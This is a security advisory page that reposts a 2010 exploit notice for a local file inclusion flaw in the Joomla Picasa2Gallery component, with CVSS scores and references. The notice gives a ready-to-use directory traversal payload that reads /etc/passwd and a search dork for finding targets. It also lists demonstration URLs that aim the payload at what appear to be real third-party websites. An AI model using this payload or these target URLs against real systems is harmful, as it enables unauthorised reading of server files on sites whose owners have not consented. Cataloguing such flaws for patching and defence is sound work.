Joomla Component Picasa2Gallery LFI vulnerability

2010.06.23
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[!]======[!] [~] Joomla Component Picasa2Gallery LFI vulnerability [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 22 june, 2010 [!]======[!] [ Software Information ] [+] Vendor : http://www.masselink.net [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"CIHUY" ;) [+] Download : http://www.masselink.net/downloads/Software/Picasa2Gallery-1.2.8/ [+] Version : 1.2.8 or lower ;) [!]======[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.veprina.com/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 http://www.strikes4mike.com/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../etc/passwd%00 etc etc etc ;] [!]======[!] [ Thx TO ] [+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW [+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack- [+] Contrex,YadoY666,bumble_be,MarahMeraH,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck [+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212 [ NOTE ] [+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM [+] Jika kami bersama Nyalakan Tanda Bahaya ;) [+] Ayy : HappY birthday yak .. maap ketinggalan aha . . . [+] MALANG ! kami datang ... ^^ [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..

References:

http://xforce.iss.net/xforce/xfdb/59669
http://www.securityfocus.com/bid/41031
http://www.exploit-db.com/exploits/13981
http://secunia.com/advisories/40297
http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt
http://osvdb.org/65674


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top